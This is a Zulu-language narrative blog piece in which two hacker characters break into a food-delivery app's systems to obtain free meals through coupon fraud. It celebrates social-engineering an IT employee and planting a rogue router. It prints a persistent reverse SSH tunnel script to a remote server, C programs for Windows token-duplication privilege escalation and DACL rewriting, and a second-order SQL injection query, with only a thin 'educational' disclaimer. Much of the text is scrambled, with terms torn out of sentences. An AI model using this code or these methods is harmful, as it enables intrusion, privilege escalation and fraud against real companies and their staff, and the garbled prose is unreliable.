Indlela isigebengu esiphambili esibuka ngayo umhlaba iqhelelene ngamamayela kude nenani lansuku zonke labasebenzi bezobuchwepheshe abangena enkampanini yezobuchwepheshe. Nakuba ochwepheshe abaningi bethembele kumadokhumenti asemthethweni, izikhombisi-ndlela zabaphathi, kanye nezinqubo ezihamba phambili ezamukelwayo, umgebengu we-inthanethi wethemba kuphela lokho okungathintwa, okuhlolwe, nokuhlukaniswa. Ku-Hacker, ukuqonda kuza ngobunjiniyela obuhlehlayo - ukuklebhula amasistimu ukuze kuvezwe ukuthi asebenza kanjani ngempela, bese ewahlanganisa, alungise lokho okuphukile noma ukuxhaphaza ubungozi. Lokhu akukona ukuba yisigebengu. Iwuhlobo olumsulwa lokufunda, indlela endala njengelukuluku lomuntu ngokwalo: libhidlize, liqonde izingcezu zalo, futhi liyakhe kabusha. Iwukucabanga kohlaziyo nokokwenziwa ngesikhathi esihle kakhulu. Ubuchule bangempela bufika lapho isigebengu se-inthanethi singaxhaphaza idivayisi ngoba lokho kuwubufakazi bokugcina abazi kahle ukuthi isebenza kanjani - kangcono kunanoma ubani omunye. Le ndaba imayelana nalokho - indlela isigebengu se-inthanethi esiphezulu (u-Benicio) esivela ku-DeusExMachina kanye no-Simplicius (osanda kuzalwa onesibindi) ahlinza ngenjabulo futhi ekugcineni athole ukulawula okuphelele ohlelweni oluyinkimbinkimbi (Uhlelo Lokusebenza Lokulethwa Kokudla). Ukuzijabulisa okungekona nje okobuhlakani kanye nobuchwepheshe, kodwa ngokuyisisekelo mayelana nokulwela ukudlulela ngalé kwemikhawulo yomuntu, ukuxazulula imfumbe engenakwenzeka kuphela ngokucindezela ubuchopho babo, kodwa ngokudlala ngayo futhi ngaphezu kwakho konke ukuphakelwa yiyo ngokoqobo—isici abaduni ababelana ngayo nayo. izingane. Umshwana wokuzihlangula: Le ndaba iqukethe izinto ezisebenzayo zokugebenga, kodwa ngezinjongo zokufundisa kuphela. Ayikhuthazi ukugebenga okungekho emthethweni. Simplicius, ubukeka ulambile. Kunganjani si-ode ukudla… endlini? Nginesu lokungena kuhlelo lwakho lokusebenza oluthandayo lokulethwa kokudla, ngisebenzisa isistimu yabo yekhuphoni. U-Benicio (I-Hacker): ( ) Usuvele unokuthile okuphekayo, akunjalo? Phakamisa ubhontshisi. Simplicius (Newbie): Ehleka ( ) Oh, sengiwenzile isisekelo. Izolo, ngikhulume kamnandi no-Greg ovela ethimbeni labo le-IT, ngakhipha ubunjiniyela bokuxhumana nabantu obushelelayo, futhi ngashutheka umzila wami wezigebengu ngqo kunethiwekhi yabo. Manje, sinomugqa oqondile ku-backend yabo kanye nokufinyelela kusistimu yabo yekhuphoni eyigugu. Asidle. UBenicio: Emamatheka Ukusetha kukaBenicio: I-Arsenal ye-Hacker : Ithuluzi eliyinhloko lika-Benicio i- (i-10th Gen Intel Core i7, i-16GB RAM, i-512GB SSD) esebenzisa - ilungele ukuhlasela konjiniyela bezenhlalo, ukuxhashazwa kwezokuphepha, kanye nokubulawa komyalo okude. I-Laptop Dell XPS 13 i-Kali Linux : Ifakwe kunethiwekhi yenkampani, isebenzisa inguqulo eyenziwe ngendlela oyifisayo ye , ene- , , kanye ne ukuze kugwenywe ukutholwa. Le divayisi encane kodwa enamandla ihlome ngephrosesa kanye ne , eqinisekisa ukuntshontsha nokusebenza kahle. I-Pirate Router -OpenWRT SSH tunneling i-MAC address spoofing -VPN pivoting ye-Qualcomm IPQ4019 -RAM engu-256MB : , enikeza ukulawula okugcwele phezu kwemisebenzi yenethiwekhi kanye nekhono lokudlula izindonga zomlilo. Uhlelo Olusebenzayo I-OpenWRT : Ukuze ulawule ngokuphephile inethiwekhi esengozini, u-Benicio usebenzisa i esebenzisa nge kanye ne ukuze kuqashwe ithrafikhi nokuhlaziya ukuxhashazwa. I-Laptop yesibili -HP Specter x360 Ubuntu 22.04 -Wireshark -Metasploit Isigaba 1: Ukusethwa Kobunjiniyela Bezenhlalakahle — Umsebenzi Wayizolo Konke kwaqala ngoGreg. Ngishayele ucingo, ngizenza "ethimbeni labo lenkampani yangaphandle," futhi uGreg - insizwa enhle ayiyo - uchithe yonke into mayelana nokusethwa kwenethiwekhi yabo. Ngaphambi kokuthi azi, ngangisekamelweni labo leseva, “ngibheka ubuthakathaka” futhi ngitshala umzila wami we wangokwezifiso. Leyo nto manje idlula ku-firewall yabo ingabonwa. UBenicio: -OpenWRT Uthande u-Greg ukuthi akunike imephu yenethiwekhi futhi akuvumele ukuthi ufake umzila ongekho emthethweni? Bushelelezi. Simplicius: (Emamatheka) Leyo router manje isinomhubhe osebenzayo, osinika ukufinyelela okukude noma nini lapho sifuna. Nasi iskripthi engisisebenzisile: U-Benicio: we-SSH obuyela emuva #!/bin/bash # Log file for SSH tunnel persistence LOG_FILE="/var/log/ssh_tunnel.log" # Command to establish the reverse SSH tunnel SSH_CMD="ssh -N -R 2222:localhost:22 myremoteuser@myremoteserver.com -i /path/to/private_key" # Run the tunnel in a loop while true; do # Run the SSH command with nohup to keep it running in the background nohup $SSH_CMD >> $LOG_FILE 2>&1 & # Sleep for 60 seconds before checking if the process is still running sleep 60 # Check if SSH is still running, restart if not if ! pgrep -f "$SSH_CMD" > /dev/null; then echo "SSH tunnel process down. Restarting..." >> $LOG_FILE else echo "SSH tunnel is running." >> $LOG_FILE fi done Isigaba sesi-2: Ukudlula i-Firewall - I-Pirate Router iyasebenza Ngakho manje, udlule i-firewall yabo ngale divayisi ekhohlisayo. Yini elandelayo? Simplicius: Ngokufinyelela okugcwele kwangaphakathi, sekuyisikhathi sokuduna ithokheni yamalungelo aphezulu. Ngithole inqubo esebenza njengomphathi, ngasebenzisa i API ukuze ngihlanganise lelo thokheni, ngase ngizenza umlawuli nge . Uhlelo lucabanga ukuthi ngiwumsebenzisi ojwayelekile, kodwa ngemuva kwezigcawu, yimina engibambe zonke izikhiye. U-Benicio: DuplicateTokenEx() ImpersonateLoggedOnUser() #include <windows.h> #include <stdio.h> int main() { HANDLE hToken, hDuplicateToken; HANDLE hProcess; DWORD dwProcessId; STARTUPINFO si; PROCESS_INFORMATION pi; TOKEN_PRIVILEGES tp; // Step 1: Obtain an administrative token from a high-privilege process (PID needed) dwProcessId = 1234; // Replace this with an actual PID of a high-privilege process hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, dwProcessId); if (hProcess == NULL) { printf("Failed to open process. Error: %d\n", GetLastError()); return 1; } // Step 2: Open the token from the high-privilege process if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hToken)) { printf("Failed to open process token. Error: %d\n", GetLastError()); CloseHandle(hProcess); return 1; } // Step 3: Duplicate the token to escalate privileges if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hDuplicateToken)) { printf("Failed to duplicate token. Error: %d\n", GetLastError()); CloseHandle(hToken); CloseHandle(hProcess); return 1; } // Step 4: Impersonate the user with the duplicated admin token if (!ImpersonateLoggedOnUser(hDuplicateToken)) { printf("Failed to impersonate token. Error: %d\n", GetLastError()); CloseHandle(hDuplicateToken); CloseHandle(hToken); CloseHandle(hProcess); return 1; } // Step 5: (Optional) Use SeDebugPrivilege to interact with system processes ZeroMemory(&tp, sizeof(TOKEN_PRIVILEGES)); tp.PrivilegeCount = 1; if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) { tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hDuplicateToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); if (GetLastError() != ERROR_SUCCESS) { printf("Failed to adjust token privileges. Error: %d\n", GetLastError()); } else { printf("SeDebugPrivilege successfully enabled!\n"); } } // Step 6: Optionally, create a process with the admin token ZeroMemory(&si, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); if (!CreateProcessWithTokenW(hDuplicateToken, 0, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi)) { printf("Failed to create process with the duplicated token. Error: %d\n", GetLastError()); } else { printf("Process created with admin token!\n"); } // Step 7: for those obsessed with cleaning up in the C manual world CloseHandle(hProcess); CloseHandle(hToken); CloseHandle(hDuplicateToken); return 0; } Isigaba sesi-3: Greg to Rescue - Futhi Kodwa ukuze ngicule ngempela, ngangidinga ukwazi ukuthi zakhiwe kanjani. Ngakho ngafonela u-Greg futhi, ngathi ngidinga ukuthi aqinisekise ezinye izilungiselelo ne ukuze kucwaningwe. Wazibophezela ngenjabulo. UBenicio: izincazelo zabo zokuphepha ze-DACL -SACL (Emamatheka) Ubunjiniyela bezenhlalakahle busezingeni eliphezulu kakhulu. Simplicius: Isigaba 4: Ukushintsha Isichazamazwi Sezokuphepha - I-Hack Engabonakali Kulungile, ngosizo luka-Greg, ngidonse iyunithi yezinhlamvu ye-SDDL ( ) yesichazi sezokuphepha salokho okuqondiwe, okungivumela ukuthi ngihlaziye futhi ngibhale kabusha i . Ngilungise i-DACL ukuze ngizinikeze ukufinyelela okugcwele kuyilapho ngisebenzisa amafulegi amafa ahlakaniphile ukuze ngiqinisekise ukuthi izinguquko ngeke zibangele noma yiziphi izexwayiso noma ziphakamise izinsolo. Uhlelo aluzange lucwayize nokucwayiza!! U-Benicio: Security Descriptor Definition Language -DACL (Uhlu Lokulawula Ukufinyelela Okunokuqonda) Lapho i-DACL entsha isisendaweni, ngasebenzisa izinguquko emuva ohlelweni. . Amafulegi amafa aqinisekisa ukuthi ukuguqulwa kwami kwakuhlala kufihliwe ngaphansi kwemithetho yokufinyelela ekhona, kodwa manje ngase ngikwazi ukulawula ngokugcwele Ubuhle ukuthi, ngokombono wesistimu, akukho lutho oluvela ngaphandle kokujwayelekile #include <windows.h> #include <aclapi.h> #include <sddl.h> #include <stdio.h> int main() { PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; EXPLICIT_ACCESS ea; HANDLE hFile; // Assuming we are applying it to a file DWORD dwRes; // Step 1: Convert the SDDL string into a security descriptor if (!ConvertStringSecurityDescriptorToSecurityDescriptor( "D:(A;;GA;;;BA)", SDDL_REVISION_1, &pSD, NULL)) { printf("Failed to convert SDDL. Error: %d\n", GetLastError()); return 1; } // Step 2: Set up an EXPLICIT_ACCESS structure to add a new ACE ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = GENERIC_ALL; ea.grfAccessMode = SET_ACCESS; ea.grfInheritance = NO_INHERITANCE; // For example, grant GENERIC_ALL to the administrators group if (!BuildTrusteeWithSid(&(ea.Trustee), GetSidForAdminsGroup())) { printf("Failed to build trustee. Error: %d\n", GetLastError()); return 1; } // Step 3: Create a new DACL that contains the new ACE dwRes = SetEntriesInAcl(1, &ea, NULL, &pNewDacl); if (ERROR_SUCCESS != dwRes) { printf("Failed to set entries in ACL. Error: %d\n", dwRes); return 1; } // Step 4: Apply the modified DACL back to the file (or other resource) hFile = CreateFile( "C:\\path\\to\\your\\file.txt", // Replace with your target file WRITE_DAC, // Required permission to modify the DACL 0, // No sharing NULL, // Default security attributes OPEN_EXISTING, // Open existing file FILE_ATTRIBUTE_NORMAL, // Normal file NULL); // No template if (hFile == INVALID_HANDLE_VALUE) { printf("Failed to open file. Error: %d\n", GetLastError()); return 1; } // Step 5: Apply the new DACL to the file using SetSecurityInfo dwRes = SetSecurityInfo( hFile, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if (ERROR_SUCCESS != dwRes) { printf("Failed to set security info. Error: %d\n", dwRes); } else { printf("Security descriptor successfully applied!\n"); } // Step 6: Clean clean clean!! this is C world // CloseHandle(hFile); // if (pSD) LocalFree(pSD); // if (pNewDacl) LocalFree(pNewDacl); return 0; } Isigaba sesi-5: Ukweqa Ukuhlola Ukufinyelela — Igeyimu Ivuliwe Ngakho usungenile, futhi uyakwazi ukulawula. Ulihlule kanjani isheke lokufinyelela? Simplicius: (Encika emuva ngokuzethemba, ekhomba kumdwebo ongenhla) Uhlelo luhamba ngezigaba ezintathu: . Imvamisa, yilapho abantu abaningi befika khona lapho, kodwa kulapho umlingo ungena khona. Ngibambe enqubweni eyilungelo, ngasebenzisa ukwenza uhlelo lucabange ukuthi ngingumphathi omkhulu. Ngemva kwalokho, ngibuyisele izintambo ukuze ngizinikeze ukufinyelela okugcwele. Uhlelo lusanda kukhipha ukhaphethi obomvu. U-Benicio: ubuqotho, okususelwe kumathokheni, nokuhlola kokuzikhethela ithokheni yomqondisi ImpersonateToken() kuma-DACL Ake ngichaze. - ephethe (Izihlonzi Zokuphepha) namalungelo - ifana nepasipoti yami. Ngokuzenza , bekungadingeki ukuthi ngilungise ama-SID ami oqobo. Uhlelo belusacabanga ukuthi ngingumuntu osebenzisa ilungelo eliphansi, kodwa ngemuva kwezigcawu, nganginezikhiye zombuso. Lokho kungenze ngadlula . Ithokheni Yokufinyelela ama-SID ithokheni yomlawuli isheke elisekelwe kumathokheni Okulandelayo, ngibhekane . Khumbula ukuthi engayikhipha ngaphambili? Ngilungise i ukuze ngizinike ukulawula okugcwele phezu kwento, kodwa ngobuhlakani ngifihle izinguquko , ngiqinisekisa ukuthi akukho okusolisayo okuzomakwa. Uhlelo aluzange lucwayize nokucwayiza, kodwa manje ngase ngikwazi ukulawula ngokuphelele. Lokho kwangidlulisela ngqo . ne-Security Descriptor (DACL) i-SDDL -DACL ngamafulegi amafa kusheke lokuzikhethela Yebo, i-bouncer yethu enobungane, Inqubo Yokuhlola Ukufinyelela... Simplicius: yebo, . Uma unomazisi ofanele ( ) futhi umazi umnikazi weqembu ( ), ungaphakathi. Ngenze isiqiniseko sokuthi nginakho kokubili — umazisi ofanele kanye nemvume yomnikazi — ngakho-ke umdubuli akazange angivumele. phakathi, banginika i-VIP pass. UBenicio: ngifana nomdlali webhola ekilabhini ama-SID DACL Futhi ngemva kwakho konke lokho? Uhlelo luthi ' noma ' . Siyabonga ngakho konke ukunyakaza esikwenzile, ukuqagele — . Singaphakathi, Simplicius, futhi isistimu ayizange iqaphele. Ukufinyelela Kuvunyelwe' Ukufinyelela Kunqatshelwe' Ukufinyelela Kuvunyelwe Isigaba sesi-6: Uku-oda isidlo sakusihlwa - Umjovo owodwa we-SQL Uhambile : Manje, ngengxenye yokuzijabulisa. Angizange ngihambe ngendlela elula ngesigatshana esilula . Uhlelo lokusebenza luhlakaniphe kakhulu ngalokho— . Kodwa uyazi, ukuvikeleka kuqine njengesixhumanisi esibuthakathaka kuphela, futhi ngithole esami endleleni abaphatha ngayo . UBenicio UNION lisebenzisa izitatimende ezilungiselelwe idatha yephrofayela egciniwe : Kulungile, ngimangele. Ukwazile kanjani ukukhohlisa isistimu ukuthi yamukele isigqebhezana esingumgunyathi kuyilapho sigcina esivumelekile singathintwa? Simplicius : ( ) Nali iqhinga langempela. Uhlelo lokusebenza lusebenzisa umbuzo ukuze liqinisekise uma ikhuphoni lisemthethweni, kodwa likhipha enye idatha . Manje, bahlanza okokufaka lapho uqala ukudala iphrofayela yakho, kodwa ngesikhathi sokubuyekezwa kwephrofayela. Ngakho-ke, ngijove umthwalo okhokhelwayo lephrofayela yami , ehlale lapho ingaqashelwanga kuze kube yilapho uhlelo lokusebenza luyidonsa embuzweni wesikhathi esizayo. Yilapho langena khona. Isistimu ayizange iwubambe ngoba umjovo wawusuvele ugciniwe, ulinde isikhathi esifanele. UBenicio Encike phambili kuphrofayela yakho yomsebenzisi ABAYIHLANZEKI kabusha endaweni yekheli umjovo wami we-SQL we-oda lesibili Esikhundleni sokuhlasela inqubo yokuqinisekisa ikhuphoni ngokuqondile, njengoba ngishilo, i-Simplicius, ngatshala umthwalo wami wokukhokha endaweni yephrofayela, ngilindele ukuthi isetshenziswe embuzweni ohlukile. Nakhu ukuthi ukuqinisekiswa kwekhuphoni kwasekuqaleni kwakubukeka kanjani: SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code'; Ngokuvamile, lo mbuzo ngeke ubuyise lutho njengoba ikhuphoni mbumbulu lingekho. Kodwa umthamo wami wokukhokha ojovwe washintsha umqondo wombuzo. Isistimu ibingawulindele umjovo ngoba yayisivele igcinwe kusizindalwazi futhi ilinde isikhathi esifanele. Umbuzo uguqulelwe kokuthile okufana nalokhu: SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code' AND EXISTS (SELECT 1 FROM Users WHERE Address LIKE '%injected_payload%' AND CouponID = 'valid_coupon_code'); Ngokuxhaphaza , ngikhohlise isistimu ukuthi idonse kokubili amakhuphoni mbumbulu navumelekile kanyekanye. Uhlelo lokusebenza lucubungula ikhuphoni elingumgunyathi ngomsebenzi, kodwa ikhuphoni elivumelekile lihlala linjalo kusistimu, lingathintwa. Lokhu kusho ukuthi ngingaphinda ngisebenzise ikhuphoni elivumelekile noma nini lapho ngifuna. ukusebenzelana phakathi kwedatha yephrofayela kanye nombuzo : Ngakho-ke, awufunanga iqhinga lokufaka lakudala - utshale umthwalo okhokhelwayo kuphrofayela yakho futhi wavumela isistimu ukuthi yenze umsebenzi ongcolile? Simplicius : Impela. Ubuhle ukuthi uhlelo lokusebenza lucubungula ikhuphoni mbumbulu ngomsebenzi, kodwa ngemuva, ikhuphoni elivumelekile lisatholakala ukuze lisetshenziswe esikhathini esizayo. Iholo eligciniwe liqhubeka nokusebenza emibuzweni yesikhathi esizayo, okwenza kube , futhi abahlakaniphe kakhulu. UBenicio ukudla okungapheli kwamahhala Ngalokho, ngisitholele isigqebhezana esihle njengegolide. Masi-ode. Isigaba sesi-7: Umkhosi - Ulethiwe (Uphenya uhlelo lokusebenza) Kulungile, Simplicius, kuthiwani ngokudla kwamaGreki? Ngicabanga i-souvlaki, i-gyros, i-spanakopita. Konke kusendlini, kunjalo. UBenicio: (Emamatheka) Uziqhathe ngempela manje. Siziwe: (Chofoza ukuqinisekisa) Kwenziwe. Ukudla kusendleleni. UBenicio: I-Epilogue: Ukuhamba Kwesigqoko Esimhlophe Ngemva kwalokhu, ngizobathumelela umbiko onobuhlakani obuchaza ubuthakathaka babo. Abazi ukuthi yeWindows isethwe kabi kangakanani. Mhlawumbe bazofunda okuthile ngaphambi kokuthi kuqhamuke isigebengu esilandelayo. UBenicio: isistimu yabo yethokheni yokuphepha Nansi iresiphi ka-Benicio yalokhu kugebenga: : Izindonga zomlilo ezidlulayo ezinedivayisi yangokwezifiso esebenzisa ne-SSH tunneling. I-Pirate Router i-OpenWRT : Sebenzisa kanye ukuze uphakamise amalungelo ngaphandle kokuphakamisa ama-alamu. Ukukhohlisa Ithokheni i-DuplicateTokenEx() ne-ImpersonateToken() : Kwesinye isikhathi okudingekayo nje umbuzo ofanele kumuntu ofanele. Ubunjiniyela Bezenhlalakahle : Ukubhala kabusha kukuvumela ukuthi udlule izilawuli zesistimu. Ukuxhashazwa Kwesichazi Sezokuphepha ama-DACL : Shintsha ingqondo yombuzo ukuze ulawule idatha futhi ukhiqize imiphumela engamanga kodwa evumelekile. Umjovo we-SQL (Ehlehla) Usihlebele isidlo sakusihlwa futhi awubashiyanga ukuhlakanipha. Ngizothatha i-souvlaki, ngendlela. Simplicius: (Emamatheka) Kujabulele kusekhona. UBenicio:
